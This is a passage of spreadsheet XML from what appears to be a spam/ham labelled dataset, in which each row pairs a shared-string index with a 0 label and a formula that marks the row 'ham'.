      <c r="C1958" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1959" t="s">
        <v>21</v>
      </c>
      <c r="B1959">
        <v>0</v>
      </c>
      <c r="C1959" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1960" t="s">
        <v>21</v>
      </c>
      <c r="B1960">
        <v>0</v>
      </c>
      <c r="C1960" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1961" t="s">
        <v>1440</v>
      </c>
      <c r="B1961">
        <v>0</v>
      </c>
      <c r="C1961" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1962" t="s">
        <v>1441</v>
      </c>
      <c r="B1962">
        <v>0</v>
      </c>
      <c r="C1962" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1963" t="s">
        <v>1442</v>
      </c>
      <c r="B1963">
        <v>0</v>
      </c>
      <c r="C1963" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1964" t="s">
        <v>21</v>
      </c>
      <c r="B1964">
        <v>0</v>
      </c>
      <c r="C1964" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1965" t="s">
        <v>1443</v>
      </c>
      <c r="B1965">
        <v>0</v>
      </c>
      <c r="C1965" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1966" t="s">
        <v>1444</v>
      </c>
      <c r="B1966">
        <v>0</v>
      </c>
      <c r="C1966" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1967" t="s">
        <v>21</v>
      </c>
      <c r="B1967">
        <v>0</v>
      </c>
      <c r="C1967" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1968" t="s">
        <v>1445</v>
      </c>
      <c r="B1968">
        <v>0</v>
      </c>
      <c r="C1968" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1969" t="s">
        <v>1446</v>
      </c>
      <c r="B1969">
        <v>0</v>
      </c>
      <c r="C1969" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1970" t="s">
        <v>1447</v>
      </c>
      <c r="B1970">
        <v>0</v>
      </c>
      <c r="C1970" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1971" t="s">
        <v>1448</v>
      </c>
      <c r="B1971">
        <v>0</v>
      </c>
      <c r="C1971" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1972" t="s">
        <v>1449</v>
      </c>
      <c r="B1972">
        <v>0</v>
      </c>
      <c r="C1972" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1973" t="s">
        <v>1450</v>
      </c>
      <c r="B1973">
        <v>0</v>
      </c>
      <c r="C1973" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1974" t="s">
        <v>1451</v>
      </c>
      <c r="B1974">
        <v>0</v>
      </c>
      <c r="C1974" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1975" t="s">
        <v>1452</v>
      </c>
      <c r="B1975">
        <v>0</v>
      </c>
      <c r="C1975" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1976" t="s">
        <v>1453</v>
      </c>
      <c r="B1976">
        <v>0</v>
      </c>
      <c r="C1976" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1977" t="s">
        <v>1454</v>
      </c>
      <c r="B1977">
        <v>0</v>
      </c>
      <c r="C1977" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1978" t="s">
        <v>1455</v>
      </c>
      <c r="B1978">
        <v>0</v>
      </c>
      <c r="C1978" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1979" t="s">
        <v>1456</v>
      </c>
      <c r="B1979">
        <v>0</v>
      </c>
      <c r="C1979" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1980" t="s">
        <v>1457</v>
      </c>
      <c r="B1980">
        <v>0</v>
      </c>
      <c r="C1980" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1981" t="s">
        <v>1458</v>
      </c>
      <c r="B1981">
        <v>0</v>
      </c>
      <c r="C1981" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1982" t="s">
        <v>1459</v>
      </c>
      <c r="B1982">
        <v>0</v>
      </c>
      <c r="C1982" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1983" t="s">
        <v>1460</v>
      </c>
      <c r="B1983">
        <v>0</v>
      </c>
      <c r="C1983" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1984" t="s">
        <v>1461</v>
      </c>
      <c r="B1984">
        <v>0</v>
      </c>
      <c r="C1984" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1985" t="s">
        <v>1462</v>
      </c>
      <c r="B1985">
        <v>0</v>
      </c>
      <c r="C1985" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1986" t="s">
        <v>1463</v>
      </c>
      <c r="B1986">
        <v>0</v>
      </c>
      <c r="C1986" t="str">
        <f t="shared" ref="C1986:C2049" si="31">IF(B1986="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1987" t="s">
        <v>1464</v>
      </c>
      <c r="B1987">
        <v>0</v>
      </c>
      <c r="C1987" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1988" t="s">
        <v>1465</v>
      </c>
      <c r="B1988">
        <v>0</v>
      </c>
      <c r="C1988" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1989" t="s">
        <v>1466</v>
      </c>
      <c r="B1989">
        <v>0</v>
      </c>
      <c r="C1989" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1990" t="s">
        <v>1467</v>
      </c>
      <c r="B1990">
        <v>0</v>
      </c>
      <c r="C1990" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1991" t="s">
        <v>1468</v>
      </c>
      <c r="B1991">
        <v>0</v>
      </c>
      <c r="C1991" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1992" t="s">
        <v>1469</v>
      </c>
      <c r="B1992">
        <v>0</v>
      </c>
      <c r="C1992" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1993" t="s">
        <v>1470</v>
      </c>
      <c r="B1993">
        <v>0</v>
      </c>
      <c r="C1993" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1994" t="s">
        <v>1471</v>
      </c>
      <c r="B1994">
        <v>0</v>
      </c>
      <c r="C1994" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1995" t="s">
        <v>1472</v>
      </c>
      <c r="B1995">
        <v>0</v>
      </c>
      <c r="C1995" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1996" t="s">
        <v>1473</v>
      </c>
      <c r="B1996">
        <v>0</v>
      </c>
      <c r="C1996" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1997" t="s">
        <v>1474</v>
      </c>
      <c r="B1997">
        <v>0</v>
      </c>
      <c r="C1997" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1998" t="s">
        <v>1475</v>
      </c>
      <c r="B1998">
        <v>0</v>
      </c>
      <c r="C1998" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1999" t="s">
        <v>1476</v>
      </c>
      <c r="B1999">
        <v>0</v>
      </c>
      <c r="C1999" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2000" t="s">
        <v>1477</v>
      </c>
      <c r="B2000">
        <v>0</v>
      </c>
      <c r="C2000" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2001" t="s">
        <v>1478</v>
      </c>
      <c r="B2001">
        <v>0</v>
      </c>
      <c r="C2001" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2002" t="s">
        <v>1479</v>
      </c>
      <c r="B2002">
        <v>0</v>
      </c>
      <c r="C2002" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2003" t="s">
        <v>1480</v>
      </c>
      <c r="B2003">
        <v>0</v>
      </c>
      <c r="C2003" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2004" t="s">
        <v>1481</v>
      </c>
      <c r="B2004">
        <v>0</v>
      </c>
      <c r="C2004" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2005" t="s">
        <v>1482</v>
      </c>
      <c r="B2005">
        <v>0</v>
      </c>
      <c r="C2005" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2006" t="s">
        <v>1483</v>
      </c>
      <c r="B2006">
        <v>0</v>
      </c>
      <c r="C2006" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2007" t="s">
        <v>1484</v>
      </c>
      <c r="B2007">
        <v>0</v>
      </c>
      <c r="C2007" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2008" t="s">
        <v>1485</v>
      </c>
      <c r="B2008">
        <v>0</v>
      </c>
      <c r="C2008" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2009" t="s">
        <v>1486</v>
      </c>
      <c r="B2009">
        <v>0</v>
      </c>
      <c r="C2009" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2010" t="s">
        <v>1487</v>
      </c>
      <c r="B2010">
        <v>0</v>
      </c>
      <c r="C2010" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2011" t="s">
        <v>1488</v>
      </c>
      <c r="B2011">
        <v>0</v>
      </c>
      <c r="C2011" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2012" t="s">
        <v>1489</v>
      </c>
      <c r="B2012">
        <v>0</v>
      </c>
      <c r="C2012" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2013" t="s">
        <v>1490</v>
      </c>
      <c r="B2013">
        <v>0</v>
      </c>
      <c r="C2013" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2014" t="s">
        <v>1491</v>
      </c>
      <c r="B2014">
        <v>0</v>
      </c>
      <c r="C2014" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2015" t="s">
        <v>1492</v>
      </c>
      <c r="B2015">
        <v>0</v>
      </c>
      <c r="C2015" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2016" t="s">
        <v>1493</v>
      </c>
      <c r="B2016">
        <v>0</v>
      </c>
      <c r="C2016" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2017" t="s">
        <v>1494</v>
      </c>
      <c r="B2017">
        <v>0</v>
      </c>
      <c r="C2017" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2018" t="s">
        <v>1495</v>
      </c>
      <c r="B2018">
        <v>0</v>
      </c>
      <c r="C2018" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2019" t="s">
        <v>1496</v>
      </c>
      <c r="B2019">
        <v>0</v>
      </c>
      <c r="C2019" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2020" t="s">
        <v>1497</v>
      </c>
      <c r="B2020">
        <v>0</v>
      </c>
      <c r="C2020" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2021" t="s">
        <v>1498</v>
      </c>
      <c r="B2021">
        <v>0</v>
      </c>
      <c r="C2021" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2022" t="s">
        <v>1499</v>
      </c>
      <c r="B2022">
        <v>0</v>
      </c>
      <c r="C2022" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2023" t="s">
        <v>1500</v>
      </c>
      <c r="B2023">
        <v>0</v>
      </c>
      <c r="C2023" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2024" t="s">
        <v>1501</v>
      </c>
      <c r="B2024">
        <v>0</v>
      </c>
      <c r="C2024" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2025" t="s">
        <v>1502</v>
      </c>
      <c r="B2025">
        <v>0</v>
      </c>
      <c r="C2025" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2026" t="s">
        <v>1503</v>
      </c>
      <c r="B2026">
        <v>0</v>
      </c>
      <c r="C2026" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2027" t="s">
        <v>1504</v>
      </c>
      <c r="B2027">
        <v>0</v>
      </c>
      <c r="C2027" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2028" t="s">
        <v>1505</v>
      </c>
      <c r="B2028">
        <v>0</v>
      </c>
      <c r="C2028" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2029" t="s">
        <v>1506</v>
      </c>
      <c r="B2029">
        <v>0</v>
      </c>
      <c r="C2029" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2030" t="s">
        <v>1507</v>
      </c>
      <c r="B2030">
        <v>0</v>
      </c>
      <c r="C2030" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2031" t="s">
        <v>1508</v>
      </c>
      <c r="B2031">
        <v>0</v>
      </c>
      <c r="C2031" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2032" t="s">
        <v>1509</v>
      </c>
      <c r="B2032">
        <v>0</v>
      </c>
      <c r="C2032" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2033" t="s">
        <v>1510</v>
      </c>
      <c r="B2033">
        <v>0</v>
      </c>
      <c r="C2033" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2034" t="s">
        <v>1511</v>
      </c>
      <c r="B2034">
        <v>0</v>
      </c>
      <c r="C2034" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2035" t="s">
        <v>1512</v>
      </c>
      <c r="B2035">
        <v>0</v>
      </c>
      <c r="C2035" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2036" t="s">
        <v>1513</v>
      </c>
      <c r="B2036">
        <v>0</v>
      </c>
      <c r="C2036" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2037" t="s">
        <v>1514</v>
      </c>
      <c r="B2037">
        <v>0</v>
      </c>
      <c r="C2037" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2038" t="s">
        <v>1515</v>
      </c>
      <c r="B2038">
        <v>0</v>
      </c>
      <c r="C2038" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2039" t="s">
        <v>1516</v>
      </c>
      <c r="B2039">
        <v>0</v>
      </c>
      <c r="C2039" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2040" t="s">
        <v>1517</v>
      </c>
      <c r="B2040">
        <v>0</v>
      </c>
      <c r="C2040" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2041" t="s">
        <v>1518</v>
      </c>
      <c r="B2041">
        <v>0</v>
      </c>
      <c r="C2041" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2042" t="s">
        <v>1519</v>
      </c>
      <c r="B2042">
        <v>0</v>
      </c>
      <c r="C2042" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2043" t="s">
        <v>1520</v>
      </c>
      <c r="B2043">
        <v>0</v>
      </c>
      <c r="C2043" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2044" t="s">
        <v>1521</v>
      </c>
      <c r="B2044">
        <v>0</v>
      </c>
      <c r="C2044" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2045" t="s">
        <v>1522</v>
      </c>
      <c r="B2045">
        <v>0</v>
      </c>
      <c r="C2045" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2046" t="s">
        <v>1523</v>
      </c>
      <c r="B2046">
        <v>0</v>
      </c>
      <c r="C2046" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2047" t="s">
        <v>1524</v>
      </c>
      <c r="B2047">
        <v>0</v>
      </c>
      <c r="C2047" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2048" t="s">
        <v>1525</v>
      </c>
      <c r="B2048">
        <v>0</v>
      </c>
      <c r="C2048" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2049" t="s">
        <v>1526</v>
      </c>
      <c r="B2049">
        <v>0</v>
      </c>
      <c r="C2049" t="str">
        <f t="shared" si="31"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2050" t="s">
        <v>1527</v>
      </c>
      <c r="B2050">
        <v>0</v>
      </c>
      <c r="C2050" t="str">
        <f t="shared" ref="C2050:C2113" si="32">IF(B2050="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2051" t="s">
        <v>1528</v>
      </c>
      <c r="B2051">
        <v>0</v>
      </c>
      <c r="C2051" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2052" t="s">
        <v>1529</v>
      </c>
      <c r="B2052">
        <v>0</v>
      </c>
      <c r="C2052" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2053" t="s">
        <v>1530</v>
      </c>
      <c r="B2053">
        <v>0</v>
      </c>
      <c r="C2053" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2054" t="s">
        <v>1531</v>
      </c>
      <c r="B2054">
        <v>0</v>
      </c>
      <c r="C2054" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2055" t="s">
        <v>1532</v>
      </c>
      <c r="B2055">
        <v>0</v>
      </c>
      <c r="C2055" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2056" t="s">
        <v>1533</v>
      </c>
      <c r="B2056">
        <v>0</v>
      </c>
      <c r="C2056" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2057" t="s">
        <v>1534</v>
      </c>
      <c r="B2057">
        <v>0</v>
      </c>
      <c r="C2057" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2058" t="s">
        <v>1535</v>
      </c>
      <c r="B2058">
        <v>0</v>
      </c>
      <c r="C2058" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2059" t="s">
        <v>1536</v>
      </c>
      <c r="B2059">
        <v>0</v>
      </c>
      <c r="C2059" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2060" t="s">
        <v>1537</v>
      </c>
      <c r="B2060">
        <v>0</v>
      </c>
      <c r="C2060" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2061" t="s">
        <v>1538</v>
      </c>
      <c r="B2061">
        <v>0</v>
      </c>
      <c r="C2061" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2062" t="s">
        <v>1539</v>
      </c>
      <c r="B2062">
        <v>0</v>
      </c>
      <c r="C2062" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2063" t="s">
        <v>21</v>
      </c>
      <c r="B2063">
        <v>0</v>
      </c>
      <c r="C2063" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2064" t="s">
        <v>1540</v>
      </c>
      <c r="B2064">
        <v>0</v>
      </c>
      <c r="C2064" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2065" t="s">
        <v>1541</v>
      </c>
      <c r="B2065">
        <v>0</v>
      </c>
      <c r="C2065" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2066" t="s">
        <v>1542</v>
      </c>
      <c r="B2066">
        <v>0</v>
      </c>
      <c r="C2066" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2067" t="s">
        <v>1543</v>
      </c>
      <c r="B2067">
        <v>0</v>
      </c>
      <c r="C2067" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2068" t="s">
        <v>1544</v>
      </c>
      <c r="B2068">
        <v>0</v>
      </c>
      <c r="C2068" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2069" t="s">
        <v>1545</v>
      </c>
      <c r="B2069">
        <v>0</v>
      </c>
      <c r="C2069" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2070" t="s">
        <v>1546</v>
      </c>
      <c r="B2070">
        <v>0</v>
      </c>
      <c r="C2070" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
